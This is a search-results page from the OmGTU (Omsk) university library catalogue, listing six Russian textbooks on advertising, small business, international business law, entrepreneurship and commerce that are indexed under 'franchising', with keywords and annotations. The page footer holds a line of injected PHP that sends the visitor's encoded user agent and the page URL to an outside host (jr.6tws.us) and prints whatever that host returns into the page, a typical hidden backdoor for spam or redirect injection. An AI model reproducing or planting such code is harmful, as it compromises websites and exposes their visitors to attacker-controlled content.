Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

57 пользователей


Зарегистрированных: 1 

Ющенко Валерия Александровна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ФРАЙЧАЙЗИНГ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 6
1. 
Пименов, Павел Алексеевич. Основы рекламы [Текст] : учеб. пособие для вузов по специальности 350700 "Реклама" / П. А. Пименов, 2006. - 399 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ОБЩЕСТВО -- МОНОКУЛЬТУРА -- ПОЛИКУЛЬТУРА -- ТОЛЕРАНТНОСТЬ -- РОССИЯ - ЗАПАД -- ЗАПАД -- МУЛЬТИКУЛЬТУРАЛИЗМ -- МУЛЬТИКУЛЬТУРНЫЙ -- МАРКЕТИНГ -- ПСИХОГРАФИЯ -- ГЛОКАЛИЗАЦИЯ -- МАРКЕТИНГОВАЯ -- КОММУНИКАЦИЯ -- СОЦИАЛЬНАЯ -- ПОЛИТИЧЕСКАЯ -- БРЕНД -- БРЭНД -- ИССЛЕДОВАНИЕ -- ЗНАК -- СИМВОЛ -- ПОСТМОДЕРНИЗМ -- РЕКЛАМНАЯ -- КАМПАНИЯ -- ПОЗИЦИОНИРОВАНИЕ -- КРЕАТИВ -- ТЕХНОЛОГИЯ -- ГРАФФИТИ -- ИНТЕРАКТИВНОЕ -- ТЕЛЕВИДЕНИЕ -- ИНТЕРНЕТ -- МЕРЧАНДАЙЗИНГ -- ПАРТИЗАНСКАЯ -- ПР -- ПАБЛИК РИЛЕЙШНЗ -- PR -- СПОНСОРСТВО -- ТОРГОВАЯ -- КАРТОЧКА -- ТРАНСПОРТНАЯ -- ФРАЙЧАЙЗИНГ -- ДЕЯТЕЛЬНОСТЬ -- РЕКЛАМНОЕ -- ЗАКОНОДАТЕЛЬСТВО
Держатели документа (Информация об экземплярах) 

Представлены основные составляющие рекламного процесса: история, цели, задачи, особенности современной мультикультурной среды, в которой реклама выполняет функции социального коммуникатора, а также технология создания и продвижения рекламного продукта. Особое внимание уделено рекламе как искусству и созидательному творчеству. Впервые в отечественной учебной практике сделана попытка связать воедино законы рекламы с языком визуального искусства и семиотикой. Завершает пособие словарь терминов - один из наиболее полных из опубликованных в рекламной литературе.

Для студентов вузов.

2. 
Малый бизнес. Организация. Экономика. Управление [Текст] : учеб. пособие для вузов по экон. специальностям / В. Я. Горфинкель [и др.] ; под ред. В. Я. Горфинкеля, В. А. Швандара, 2007. - 495 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ЭКОНОМИКА -- РЫНОЧНАЯ -- РОССИЯ -- США -- РАЗВИТИЕ -- СОБСТВЕННОЕ -- ДЕЛО -- ПРЕДПРИЯТИЕ -- БИЗНЕС-ПЛАН -- ПЛАН -- УПРАВЛЕНИЕ -- РИСК -- ДЕЯТЕЛЬНОСТЬ -- ПРОИЗВОДСТВЕННАЯ -- КОММЕРЧЕСКАЯ -- ФИНАНСОВАЯ -- КОНСАЛТИНГОВАЯ -- КОНСУЛЬТИРОВАНИЕ -- РЕГИСТРАЦИЯ -- ЛИЦЕНЗИРОВАНИЕ -- ЛИЗИНГ -- ФРАЙЧАЙЗИНГ -- МЕНЕДЖМЕНТ -- МАРКЕТИНГ -- ПЕРСОНАЛ -- МАЛОЕ -- ИННОВАЦИОННОЕ -- ИННОВАЦИЯ -- ТЕХНОПАРК -- НОВОВВЕДЕНИЕ -- ФИНАНСИРОВАНИЕ -- КОНКУРЕНЦИЯ -- конкурентоспособность -- ФИРМА -- КУЛЬТУРА -- ЭТИКА -- ДЕЛОВАЯ -- ДЕЛОВОЙ -- ЭТИКЕТ -- ОБЩЕНИЕ -- ДЕЛОВОЕ -- ФИНАНСЫ -- УЧЕТ -- ПЛАНИРОВАНИЕ -- ФИНАНСОВОЕ -- КРЕДИТОВАНИЕ -- БУХУЧЕТ -- БУХГАЛТЕРСКИЙ -- НАЛОГООБЛОЖЕНИЕ -- НАЛОГОВАЯ -- ПОЛИТИКА -- НАЛОГОВОЕ -- ПРАВОНАРУШЕНИЕ -- ОТВЕТСТВЕННОСТЬ -- СТРАХОВАНИЕ -- СТРАХОВОЕ -- ГОСУДАРСТВЕННАЯ -- ПОДДЕРЖКА -- ЯПОНИЯ -- ГЕРМАНИЯ

Третье издание отличается более глубоким и актуализированным рассмотрением проблем малого бизнеса. Раскрывается сущность малого бизнеса, показано его значение для развития рыночной экономики в России.

Помимо организационных и экономических аспектов создания и функционирования предприятий малого бизнеса рассматриваются вопросы их маркетинговой деятельности, финансирования и кредитования, страхования, особенности бухгалтерского учета и налогообложения. Анализируются проблемы управления персоналом, культуры и этики предприятий малого бизнеса. В книге использован опыт малого бизнеса в России и ряде зарубежных стран (США, Японии,Германии и др.). Показаны проблемы и перспективы развития малого бизнеса в России.

Для студентов, обучающихся по специальностям экономики и управления, а также для менеджеров, руководителей организаций и предпринимателей.

3. 
Белов, Анатолий Павлович. Международное предпринимательское право [Текст] : Практ. пособие / А. П. Белов, 2001. - 330 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- ВНЕШНЕЭКОНОМИЧЕСКАЯ ДЕЯТЕЛЬНОСТЬ -- ВНЕШНЕЭКОНОМИЧЕСКАЯ СДЕЛКА -- ПРЕДПРИНИМАТЕЛЬСКАЯ ДЕЯТЕЛЬНОСТЬ -- ВНЕШНЕТОРГОВАЯ СДЕЛКА -- КУПЛЯ -- ПРОДАЖА -- ЛИЗИНГ -- ФАКТОРИНГ -- ФОРФЕЙТИНГ -- ФРАЙЧАЙЗИНГ -- ЛИЦЕНЗИОННОЕ СОГЛАШЕНИЕ -- ВНЕШНЕТОРГОВАЯ СДЕЛКА -- МЕЖДУНАРОДНАЯ ТОРГОВЛЯ -- ДОГОВОР -- ВНЕШНЯЯ ТОРГОВЛЯ -- ПОСРЕДНИЧЕСТВО -- ВНЕШНЕТОРГОВАЯ ОПЕРАЦИЯ -- ПРОМЫШЛЕННАЯ СОБСТВЕННОСТЬ -- ПАТЕНТ -- ТОВАРНЫЙ ЗНАК -- ОФФШОРНАЯ ТЕРРИТОРИЯ -- СПОР -- АРБИТРАЖ -- БИЗНЕСМЕН -- ПРЕДПРИНИМАТЕЛЬ -- ВНЕШНЕТОРГОВЫЕ -- ОПЕРАЦИИ -- ПРОМЫШЛЕННАЯ -- СОБСТВЕННОСТЬ -- ГАРАНТИИ -- ЗАЩИТА -- КАПИТАЛА -- ИНОСТРАННОГО -- ОФФШОРНЫЕ -- ТЕРРИТОРИИ -- АРБИТРАЖНОЕ -- РАЗРЕШЕНИЕ -- КОММЕРЧЕСКИЙ -- ЗЛОУПОТРЕБЛЕНИЕ -- ИММУНИТЕТ -- ГОСУДАРСТВА -- ИСКОВАЯ -- ДАВНОСТЬ

В книге идет речь о наиболее часто встречающихся во внешней торговле и инвестиционной сфере видах предпринимательской деятельности; раскрывается понятие и приводятся основные виды внешнеэкономической сделки, рассматриваются правовые условия и способы обеспечения их исполнения. Особое внимание уделено таким вопросам, как злоупотребление правом, публичный порядок, судебный иммунитет государства. Проводится сравнение права России и ряда иностранных государств с учетом международной коммерческой практики.

Данное практическое пособие отличает то, что в нем содержатся выводы и рекомендации, которыми могут воспользоваться как российские, так и иностранные бизнесмены. Оно станет незаменимым учебником для студентов специальных вузов.

4. 
Сборник договоров [Текст] : Сост. на основе нового Гражданского кодекса РФ / Авт.-сост.: А. Н. Долженко и др, 1999. - 232 с.
Ключевые слова 
5. 
Муравьев, Алексей Иванович. Предпринимательство [Текст] : Учеб. для вузов по экон. специальностям / А. И. Муравьев, А. М. Игнатьев, А. Б. Крутик, 2001. - 695 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- ПРЕДПРИЯТИЕ -- БИЗНЕС-ПЛАН -- РОССИЯ -- БИЗНЕС -- МАЛЫЙ БИЗНЕС -- ФРАЙЧАЙЗИНГ -- РЕГИСТРАЦИЯ -- РЕФОРМИРОВАНИЕ -- ЛИЦЕНЗИРОВАНИЕ -- БАНК -- БИРЖА -- ФИРМА -- ТАМОЖНЯ -- НАЛОГ -- АРБИТРАЖ -- МЕНЕДЖМЕНТ -- ЭТИКА -- ДЕЛОВАЯ ЭТИКА -- Планирование -- Финансовый менеджмент -- Инвестиция -- Кредитование -- Финансовый рынок -- Рынок -- Вексель -- Факторинг -- Лизинг -- Страхование -- Риск -- Недвижимость -- Инновация -- Ценная бумага -- Маркетинг -- Спрос -- Сбыт -- Товар -- Реклама -- Ценообразование -- Россия
Держатели документа (Информация об экземплярах) 
6. 
Дашков, Леонид Павлович. Коммерция и технология торговли [Текст] : Учеб. для вузов / Л. П. Дашков, В. К. Памбухчиянц, 2000. - 442 с.
Ключевые слова 
Коммерция -- Коммерческая деятельность -- Торговля -- Учебник и пособие -- Договор -- Оптовая продажа -- Биржа -- Биржевая торговля -- Торговая операция -- Аукцион -- Реклама -- Лизинг -- Фрайчайзинг -- Склад -- Тара -- Перевозка товара -- Розничная торговля -- Контроль -- Защита прав потребителей -- Товар -- Бизнес -- Магазин -- ПРЕДПРИЯТИЕ розничное торговое -- МАГАЗИН -- ТОРГОВЫЙ зал -- ОБОРУДОВАНИЕ ТОРГОВО - ТЕХНОЛОГИЧЕСКОЕ -- ИНТЕРЬЕР МАГАЗИНА -- ЗАЩИТА ПРАВ ПОТРЕБИТЕЛЕЙ -- ТОРГОВЛЯ - КОНТРОЛЬ ГОСУДАРС -- ПРАВИЛА ПРОДАЖИ ТОВАРА -- ПРАВИЛА РОЗНИЧНОЙ ТОРГОВЛИ -- машина контрольно-кассовая -- ПРАВИЛА САНИТАРНЫЕ -- УПРАВЛЕНИЕ ТОРГОВЫМ ПРОЦЕССОМ -- ПРОЕКТИРОВАНИЕ ПРЕДПРИЯТИЙ ТОРГОВЛИ -- СТРОИТЕЛЬСТВО КАПИТАЛЬНОЕ ТОРГОВЫХ ПРЕДПРИЯТИЙ -- СТРОИТЕЛЬСТВО ПРЕДПРИЯТИЙ ТОРГОВЫХ -- РЕМОНТ ТОРГОВЫХ ПРЕДПРИЯТИЙ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3182 - 25.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.96 с.12 запросов, 1.08c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;